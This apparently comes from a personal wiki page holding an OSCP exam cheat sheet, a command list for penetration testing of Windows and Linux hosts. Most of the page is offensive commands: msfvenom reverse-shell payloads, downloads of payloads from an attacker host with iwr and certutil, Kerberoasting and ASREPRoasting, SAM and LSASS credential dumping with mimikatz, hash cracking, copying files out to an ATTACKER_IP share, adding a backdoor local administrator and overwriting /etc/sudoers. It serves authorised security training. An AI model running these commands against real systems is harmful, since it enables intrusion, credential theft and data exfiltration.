Create New Document

The title of your document (will be displayed as H1)
URL-friendly name (no spaces, use dashes)
Path where to create document (optional, use forward slashes to create subdirectories)

Move/Rename Document

Current location of the document
New path for the document (including the slug)
This only changes the document's path. It does not modify the document's title (H1 heading).

Delete Document

Are you sure you want to delete this document? This action cannot be undone.

Warning: If this is a folder, all contents including subfolders and documents will be deleted.

Message

Message content goes here.

Confirm Action

Are you sure?

Attachments

Allowed file types: jpg, jpeg, png, gif, svg, webp, txt, log, csv, sfd, zip, pdf, docx, xlsx, pptx, mp4 (Max: 50MB)

Document Files

Loading attached files...

Document History

Previous Versions

Preview

Select a version to preview

Wiki Settings

Language for the user interface
Number of versions to keep per document. Set to 0 to disable versioning.
Maximum allowed file size for uploads in MB.

User Management

Add New User

Leave empty to keep current password
Users with these groups can access restricted sections.

Define path-based access rules for sections of your wiki, then assign users to groups in the Users tab. Rules are evaluated in order. First match wins.

Active Rules

Import markdown files from a ZIP archive. Files will be processed and stored in the appropriate document structure. Directory structure in the ZIP (category/subcategory) will be preserved in the wiki.

Upload a ZIP file containing markdown (.md) files to import.

Create and manage backups of your wiki data. Backups include all documents, images, and configuration files.

Available Backups

Loading backups...

Add/Edit Access Rule

Selected: /

Add Column

Add Link

📚 fullfox notes
oscp cheatsheet 🥷
fullfox
Copyright 2025 © All rights reserved.
Home oscp cheatsheet 🥷

oscp cheatsheet 🥷

Blackbox reconnaissance 

nmap -iL hosts.txt -p- -sVC -T5

sudo nmap <host> -sU -F


onesixtyone <TARGET> -c /usr/share/wordlists/snmp.txt
snmpwalk -v 1 -c public  <TARGET> NET-SNMP-EXTEND-MIB::nsExtendObjects
snmpwalk -v1 -c public <TARGET> .1.3.6.1.4.1.8072.1.3.2

ldapsearch -x -H ldap://<TARGET> -s base namingcontexts

mssqlclient.py user:passwd@IP -windows-auth

wget -m <TARGET>/.git/ -R "index.html*"

RCE 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f exe -o shell.exe

powershell.exe -c "whoami;shell2.exe"

iwr http://<HOST>:<PORT>/shell.exe -O shell.exe"
iwr http://<HOST>:<PORT>/shell.exe -O shell.exe -UseBasicParsing"

certutil -urlcache -split -f http://HOST:PORT/tool.exe tool.exe

Lateral movement 

psexec.py  <domain>/<user>:<password>@<IP> -hashes ":<NT hash>"
psexec.py <domain>/<user>:<password>@<IP>

evil-winrm -i <TARGET> -u <USER> -p <PASSWORD>

Machine/account reconnaissance 

whoami /user

netstat -ano | findstr LISTENING

tree /f /a
dir /s /a:h
dir C:\

whoami /priv

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Bloodhound collect:

bloodhound-ce-python -u <USER> -p <PASSWORD> -dc DC01.<DOMAIN> --dns-tcp -ns <DC_IP> -d <DOMAIN> --zip

powershell -ep bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\user\Desktop\ -OutputPrefix "export"

Kerberoast (auth)

nxc ldap <TARGETS> -u <USER> -p <PASSWORD> --kerberoast hashes.kerberoast

hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

ASREPRoast:

# Unauthent
nxc ldap <TARGETS> -u users.txt -p '' --asreproast output.txt

# Authent
nxc ldap <TARGETS> -u <USER>  -p <PASSWORD> --asreproast hashes.asreproast

nxc ldap <TARGETS> -u <USER>  -p <PASSWORD> --asreproast hashes.asreproast --kdcHost domain_name

hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

SAM:

C:\Windows\System32\config\SAM
icacls SAM

secretsdump.py -sam SAM -system SYSTEM LOCAL -outputfile secrets

Admin

LSASS Dumping (admin):

mimikatz
$ privilege::debug
$ sekurlsa::logonpasswords

TGT Dumping (admin):

mimikatz
$ privilege::debug
$ sekurlsa::tickets /export

Compress-Archive -Path *.kirbi -DestinationPath tickets.zip

Crack NT-hash:

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Crack netNTLM chall response:

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

-> dcsync

-> when spreading with nxc --local-auth for local admin

awk -F: '$2 ~ /^\$/ {print $1":"$2}' /etc/shadow > hashes.txt hashcat -m 1800 hashes.txt rockyou.txt --username

Misc

Exfiltration SMB:

smbserver.py myshare . -smb2support

copy C:\path\to\file.txt \\ATTACKER_IP\share\

Create local admin for RDP access:

net user <USERNAME> <PASSWORD> /add
net localgroup administrators <USERNAME> /add

Linux privsc 

uname -a
cat /etc/os-release

crontab -l

find / -perm -u=s -type f 2>/dev/null
sudo -l


su username
sudo su

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o shell.elf


# from root file write
echo 'kali ALL=(root) NOPASSWD: ALL' > /etc/sudoers

https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

# Within reverse shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color

# Then CTRL+Z

# Then locally
stty raw -echo
fg


# To reset
reset
Search Results